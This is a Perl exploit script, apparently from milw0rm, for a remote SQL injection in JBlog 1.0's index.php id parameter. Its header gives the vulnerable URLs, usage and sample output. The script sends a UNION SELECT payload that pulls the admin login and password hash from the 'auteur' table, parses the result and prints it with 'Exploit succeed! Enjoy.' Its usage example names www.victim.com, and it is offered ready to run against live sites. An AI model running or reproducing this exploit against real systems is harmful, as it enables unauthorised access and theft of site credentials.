##################################################
# Script....................................: JBlog ver 1.0
# Script Site...........................: http://www.jmuller.net/jblog/index.php
# Vulnerability........................: Remote SQL injection Exploit
# Access..................................: Remote
# level......................................: Dangerous
# Author..................................: S4mi
# Contact.................................: S4mi[at]LinuxMail.org
##################################################
#Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, r0_0t, ddx39 .....
#
##################################################
#Vuln :
#http://127.0.0.1/jblog/index.php?id=[SQL]
#http://127.0.0.1/jblog/admin/modifpost.php?id=[SQL] (shoud have access to admin area "use my last JBlog Xploit")
#Probably Other files are affected
#*************************************
#Usage : C:\Xploit.pl 127.0.0.1 /Jblog/
#Result Screen Shout :
#*************************************
# Connecting ...[OK]
# Sending Data ...[OK]
#
# + Exploit succeed! Enjoy.
# + ---------------- +
# + Password: e10adc3949ba59abbe56e057f20f883e
# + Username: admin
###################################################
#!/usr/bin/perl
use IO::Socket ;
&header();
&usage unless(defined($ARGV[0] && $ARGV[1]));
$host = $ARGV[0];
$path = $ARGV[1];
syswrite STDOUT ,"\n Connecting ...";
my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
die "\n Unable to connect to $host\n" unless($sock);
syswrite STDOUT, "[OK]";
$inject = "union%20select%200,login,pass,3,4,5%20from%20auteur%20WHERE%20id=1/*";
syswrite STDOUT ,"\n Sending Data ...";
print $sock "GET $path/index.php?id='$inject HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Connection: Close\n\n";
syswrite STDOUT ,"[OK]\n\n";
while($answer = <$sock>){
if ($answer =~ /class='titre'>(.*?)<\/span>/){
print "+ Exploit succeed! Enjoy.\n";
print "+ ---------------- +\n";
print "+ Password: $1\n";
}
if($answer =~ / '(.*?)' /){
print "+ Username: $1\n";
}
}
sub usage{
print "\nUsage : perl $0 host /path/ ";
print "\nExemple : perl $0 www.victim.com /JBlog/\n";
exit(0);
}
sub header(){
print q(
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Script.................: JBlog ver 1.0
Script Site............: http://www.jmuller.net/jblog/index.php
Vulnerability..........: Remote SQL injection Exploit
Access.................: Remote
level..................: Dangerous
Author.................: S4mi
Contact................: S4mi[at]LinuxMail.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
);
}
# milw0rm.com [2007-09-14]
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